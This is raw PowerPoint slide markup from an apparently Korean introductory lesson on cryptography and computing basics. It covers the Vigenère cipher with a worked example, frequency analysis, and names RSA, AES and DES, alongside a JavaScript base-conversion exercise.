                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/Vigenere</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>비즈네르</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>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194" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{819EE01E-EDA9-4FC9-8BBE-F550D18986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2748" y="2623235"/>
            <a:ext cx="5795944" cy="47421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비제네르 표 예시 설명">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8BA64F4-A8D4-4581-93DC-84F05B4731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39" y="1849333"/>
            <a:ext cx="6133391" cy="4568024"/>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DC38C039-9D27-4916-B4B3-1D7BFA1683CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1004207" y="2038169"/>
            <a:ext cx="228599" cy="4362860"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FDDF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4D0653C-D35D-402D-8AF5-FD2D13A9286B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6340755" y="3155421"/>
            <a:ext cx="4615094" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>divert troops to east ridge =&gt;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1"/>
              <a:t>vstwbrlbmgzqlycscrjsbyo</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2206A4D5-6703-4CDA-A329-9AABE5831DCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10955849" y="3155420"/>
            <a:ext cx="1329180" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F743BB"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Key = SKY</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F743BB"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D75CB736-F76B-498F-AA76-AA9EBDF9EDC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6272748" y="3521168"/>
            <a:ext cx="6080288"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같은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'o'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>에 대해서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'M','G','Y'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>세가지가 나온 것을 알 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>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빈도분석법으로는 해독이 불가능</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="202122"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>평문이</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 아주 길며</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>키의 길이를 안다고 가정했을 시 빈도분석법 가능</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{129849F9-5019-46F5-8FDB-B6B2AE2B7D9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="6492875"/>
            <a:ext cx="5257801" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>비즈네르</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t> 표</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>.    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F743BB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ex)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t> ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>원문 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>“d”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>키워드 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>“S” ) -&gt; ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>암호문</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t> “V” ) </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38635185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/T5 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>현대</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>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2761863200"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3693381" y="2564266"/>
          <a:ext cx="3959749" cy="1967740"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="943933">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1593522546"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3015816">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RSA</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AES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DES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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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079849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621847347"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2152359" y="2911195"/>
          <a:ext cx="7677647" cy="1035610"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1674671">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3411008718"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4835475">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="235996590"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1167501">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3718095560"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1035610">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" fontAlgn="base" latinLnBrk="0">
                        <a:lnSpc>
                          <a:spcPct val="130000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>컴퓨터기초</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="105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100" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>정보의표현</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="105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100" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>• </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>디지털 데이터</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="11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100" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>- </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>비트</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>바이트</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>이진수</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, 16</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>진수</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>아스키 코드</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>파일</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>확장자</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>파일헤더</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="105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050" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>실습</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="105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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20248613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눈이 감기는 걸 보니 졸업이 얼마 남지 않았구나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 과연 몇 초가 남았을까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초를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>2, 4, 8,16 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>진수로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>구해보시오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자바스크립트는 변수를 나타낼 때 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>이란 문법을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어떻게 쓰는 것인지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google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검색하여 찾는다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highlightClick="1"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87479872-17A0-4CBD-B7DC-818B95F4DA27}"/>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2297159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096000" y="369000"/>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답은 아래와 같다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66E4D11-808F-4C1C-BB74-08512BD03F20}"/>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남은 시간을 변수로 입력한다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en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>remain_time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수를 이용하여 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="그림 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10AD4106-2BCF-4235-9F30-ED5FB6008042}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="587829" y="743184"/>
            <a:ext cx="5208698" cy="1356522"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="그림 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87E23B58-B828-47D7-8895-C1D458FC7032}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
